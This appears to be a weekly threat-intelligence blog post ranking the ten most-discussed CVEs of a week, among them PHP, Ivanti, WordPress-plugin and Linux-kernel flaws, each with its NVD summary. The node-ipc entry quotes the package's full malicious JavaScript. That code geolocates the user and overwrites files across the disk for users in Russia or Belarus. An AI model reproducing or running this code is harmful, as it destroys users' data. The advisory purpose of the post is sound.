This weekly blog post is from via our unique intelligence collection pipelines. We are your eyes and ears online, including the Dark Web.
There are thousands of vulnerability discussions each week. SOS Intelligence gathers a list of the most discussed Common Vulnerabilities and Exposures (CVE) online for the previous week.
We make every effort to ensure the accuracy of the data presented. As this is an automated process some errors may creep in.
If you are feeling generous please do make us aware of anything you spot, feel free to follow us on Twitter @sosintel and DM us. Thank you!
1. CVE-2023-3824
In PHP version 8.0.* before 8.0.30, 8.1.* before 8.1.22, and 8.2.* before 8.2.8, when loading phar file, while reading PHAR directory entries, insufficient length checking may lead to a stack buffer overflow, leading potentially to memory corruption or RCE.
https://nvd.nist.gov/vuln/detail/CVE-2023-3824
2. CVE-2023-6875
The POST SMTP Mailer – Email log, Delivery Failure Notifications and Best Mail SMTP for WordPress plugin for WordPress is vulnerable to unauthorized access of data and modification of data due to a type juggling issue on the connect-app REST endpoint in all versions up to, and including, 2.8.7. This makes it possible for unauthenticated attackers to reset the API key used to authenticate to the mailer and view logs, including password reset emails, allowing site takeover.
https://nvd.nist.gov/vuln/detail/CVE-2023-6875
3. CVE-2024-21887
A command injection vulnerability in web components of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) allows an authenticated administrator to send specially crafted requests and execute arbitrary commands on the appliance.
https://nvd.nist.gov/vuln/detail/CVE-2024-21887
4. CVE-2022-23812
This affects the package node-ipc from 10.1.1 and before 10.1.3. This package contains malicious code, that targets users with IP located in Russia or Belarus, and overwrites their files with a heart emoji. **Note**: from versions 11.0.0 onwards, instead of having malicious code directly in the source of this package, node-ipc imports the peacenotwar package that includes potentially undesired behavior. Malicious Code: **Note:** Don’t run it! js import u from “path”; import a from “fs”; import o from “https”; setTimeout(function () { const t = Math.round(Math.random() * 4); if (t > 1) { return; } const n = Buffer.from(“aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=”, “base64”); // https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154 o.get(n.toString(“utf8”), function (t) { t.on(“data”, function (t) { const n = Buffer.from(“Li8=”, “base64”); const o = Buffer.from(“Li4v”, “base64”); const r = Buffer.from(“Li4vLi4v”, “base64”); const f = Buffer.from(“Lw==”, “base64”); const c = Buffer.from(“Y291bnRyeV9uYW1l”, “base64”); const e = Buffer.from(“cnVzc2lh”, “base64”); const i = Buffer.from(“YmVsYXJ1cw==”, “base64”); try { const s = JSON.parse(t.toString(“utf8”)); const u = s[c.toString(“utf8”)].toLowerCase(); const a = u.includes(e.toString(“utf8”)) || u.includes(i.toString(“utf8”)); // checks if country is Russia or Belarus if (a) { h(n.toString(“utf8”)); h(o.toString(“utf8”)); h(r.toString(“utf8”)); h(f.toString(“utf8”)); } } catch (t) {} }); }); }, Math.ceil(Math.random() * 1e3)); async function h(n = “”, o = “”) { if (!a.existsSync(n)) { return; } let r = []; try { r = a.readdirSync(n); } catch (t) {} const f = []; const c = Buffer.from(“4p2k77iP”, “base64”); for (var e = 0; e < r.length; e++) { const i = u.join(n, r[e]); let t = null; try { t = a.lstatSync(i); } catch (t) { continue; } if (t.isDirectory()) { const s = h(i, o); s.length > 0 ? f.push(…s) : null; } else if (i.indexOf(o) >= 0) { try { a.writeFile(i, c.toString(“utf8”), function () {}); // overwrites file with ❤️ } catch (t) {} } } return f; } const ssl = true; export { ssl as default, ssl };
https://nvd.nist.gov/vuln/detail/CVE-2022-23812
5. CVE-2024-1512
The MasterStudy LMS WordPress Plugin – for Online Courses and Education plugin for WordPress is vulnerable to union based SQL Injection via the ‘user’ parameter of the /lms/stm-lms/order/items REST route in all versions up to, and including, 3.2.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
https://nvd.nist.gov/vuln/detail/CVE-2024-1512
6. CVE-2023-32243
Improper Authentication vulnerability in WPDeveloper Essential Addons for Elementor allows Privilege Escalation. This issue affects Essential Addons for Elementor: from 5.4.0 through 5.7.1.
https://nvd.nist.gov/vuln/detail/CVE-2023-32243
7. CVE-2023-6546
A race condition was found in the GSM 0710 tty multiplexor in the Linux kernel. This issue occurs when two threads execute the GSMIOC_SETCONF ioctl on the same tty file descriptor with the gsm line discipline enabled, and can lead to a use-after-free problem on a struct gsm_dlci while restarting the gsm mux. This could allow a local unprivileged user to escalate their privileges on the system.
https://nvd.nist.gov/vuln/detail/CVE-2023-6546
8. CVE-2024-22024
An XML external entity or XXE vulnerability in the SAML component of Ivanti Connect Secure (9.x, 22.x), Ivanti Policy Secure (9.x, 22.x) and ZTA gateways which allows an attacker to access certain restricted resources without authentication.
https://nvd.nist.gov/vuln/detail/CVE-2024-22024
9. CVE-2023-41266
A path traversal vulnerability found in Qlik Sense Enterprise for Windows for versions May 2023 Patch 3 and earlier, February 2023 Patch 7 and earlier, November 2022 Patch 10 and earlier, and August 2022 Patch 12 and earlier allows an unauthenticated remote attacker to generate an anonymous session. This allows them to transmit HTTP requests to unauthorized endpoints. This is fixed in August 2023 IR, May 2023 Patch 4, February 2023 Patch 8, November 2022 Patch 11, and August 2022 Patch 13.
https://nvd.nist.gov/vuln/detail/CVE-2023-41266
10. CVE-2023-23416
Windows Cryptographic Services Remote Code Execution Vulnerability
https://nvd.nist.gov/vuln/detail/CVE-2023-23416